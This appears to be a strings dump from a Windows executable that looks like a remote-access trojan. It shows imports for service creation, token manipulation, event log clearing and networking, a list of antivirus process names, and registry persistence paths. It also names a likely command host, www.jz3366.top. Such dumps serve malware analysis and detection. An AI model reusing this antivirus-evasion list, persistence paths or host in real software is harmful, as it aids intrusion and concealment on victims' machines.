!This program cannot be run in DOS mode.
`.data
SSSVh#
SGSWhz,@
SGSWhl"@
SPhtr@
PSSSSS
@PhH)@
^VShLa@
PSSSSS
PSSSSSSVS
YFYt'V
VPPPPh
VHtAHt,Ht
VWh,i@
s9VVVW
SVWj@3
SVWh\n@
4SVWh\n@
t\HtwHt0H
VirtualFree
VirtualAlloc
InterlockedExchange
GetProcAddress
LoadLibraryA
LocalFree
LocalSize
LocalAlloc
GetTickCount
lstrcatA
WriteFile
CreateFileA
lstrlenA
FreeLibrary
CloseHandle
GetModuleFileNameA
WaitForSingleObject
GetVersionExA
CopyFileA
GetCurrentProcess
GetModuleHandleA
GlobalMemoryStatusEx
HeapAlloc
GetProcessHeap
VirtualProtect
HeapFree
SetEvent
CreateEventA
lstrcmpiA
Process32Next
Process32First
CreateToolhelp32Snapshot
lstrcpyA
KERNEL32.dll
wsprintfA
GetClassNameA
GetWindow
GetWindowTextA
FindWindowA
GetLastInputInfo
USER32.dll
CloseEventLog
ClearEventLogA
OpenEventLogA
SetServiceStatus
RegisterServiceCtrlHandlerA
StartServiceCtrlDispatcherA
ADVAPI32.dll
??3@YAXPAX@Z
memcpy
__CxxFrameHandler
_CxxThrowException
memset
??2@YAPAXI@Z
memcmp
strlen
strstr
strcpy
strncpy
strrchr
strcspn
memmove
strcat
strcmp
realloc
_beginthreadex
_except_handler3
strchr
MSVCRT.dll
??1type_info@@UAE@XZ
__dllonexit
_onexit
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_controlfp
GetStartupInfoA
_strupr
_stricmp
_strcmpi
bad Allocate
bad buffer
KERNEL32.dll
PluginMe
OpenProxy
CloseProxy
SeShutdownPrivilege
System
Security
Application
Remark
SYSTEM\CurrentControlSet\Services\%s
%s\%d.bak
%s\shell\open\command
Applications\iexplore.exe\shell\open\command
www.jz3366.top
Defghi
Defghi Klmnopqr Tuvwxyab Defg
Defghijk Mnopqrstu Wxyabcd Fghijklm Opq
BaiduSdSvc.exe
ServUDaemon.exe
mssecess.exe
QUICK HEAL
QUHLPSVC.EXE
V3Svc.exe
patray.exe
AYAgent.aye
Miner.exe
TMBMSRV.exe
knsdtray.exe
QQ.exe
K7TSecurity.exe
QQPCRTP.exe
ksafe.exe
rtvscan.exe
ashDisp.exe
Avira(
avcenter.exe
kxetray.exe
egui.exe
Mcshield.exe
RavMonD.exe
KvMonXP.exe
avp.exe
HipsTray.exe
360sd.exe
360tray.exe
%s:%d:%s
SysFreeString
Oleaut32.dll
CoCreateInstance
CoUninitialize
CoInitialize
Ole32.dll
CreateEnvironmentBlock
userenv.dll
RtlGetNtVersionNumbers
ntdll.dll
%d*%sMHz
HARDWARE\DESCRIPTION\System\CentralProcessor\0
%s Win7
kernel32.dll
IsWow64Process
IsBadReadPtr
wininet.dll
CreateProcessAsUserA
SetTokenInformation
DuplicateTokenEx
OpenProcessToken
DeleteService
ChangeServiceConfig2A
CreateServiceA
ControlService
QueryServiceStatus
CloseServiceHandle
StartServiceA
OpenServiceA
OpenSCManagerA
RegisterServiceCtrlHandlerA
SetServiceStatus
ADVAPI32.dll
gethostname
getsockname
select
WSAIoctl
setsockopt
closesocket
connect
gethostbyname
socket
WSACleanup
WSAStartup
ws2_32.dll
strstr
memset
memcpy
strlen
strcmp
MSVCRT.dll
EnumWindows
SendMessageA
IsWindowVisible
MessageBoxA
ExitWindowsEx
wsprintfA
User32.dll
GetCurrentProcess
WTSGetActiveConsoleSessionId
MoveFileExA
MoveFileA
GetSystemDirectoryA
GetSystemInfo
ExpandEnvironmentStringsA
GetExitCodeProcess
GetVersionExA
TerminateThread
SetEvent
CancelIo
ResetEvent
CreateEventA
GetFileAttributesA
WaitForSingleObject
GetTickCount
lstrcatA
CloseHandle
GetLastError
ReleaseMutex
CreateMutexA
GetModuleFileNameA
CreateProcessA
GetCurrentThreadId
CloseDesktop
SetThreadDesktop
GetUserObjectInformationA
user32.dll
OpenDesktopA
InternetCloseHandle
InternetReadFile
InternetOpenUrlA
MSIE 6.0
InternetOpenA
LookupPrivilegeValueA
AdjustTokenPrivileges
Process32Next
Process32First
CreateToolhelp32Snapshot
RegCloseKey
RegEnumKeyExA
RegEnumValueA
RegOpenKeyExA
RegQueryValueExA
RegDeleteValueA
RegDeleteKeyA
RegSetValueExA
RegCreateKeyExA
.?AVtype_info@@
FriendlyName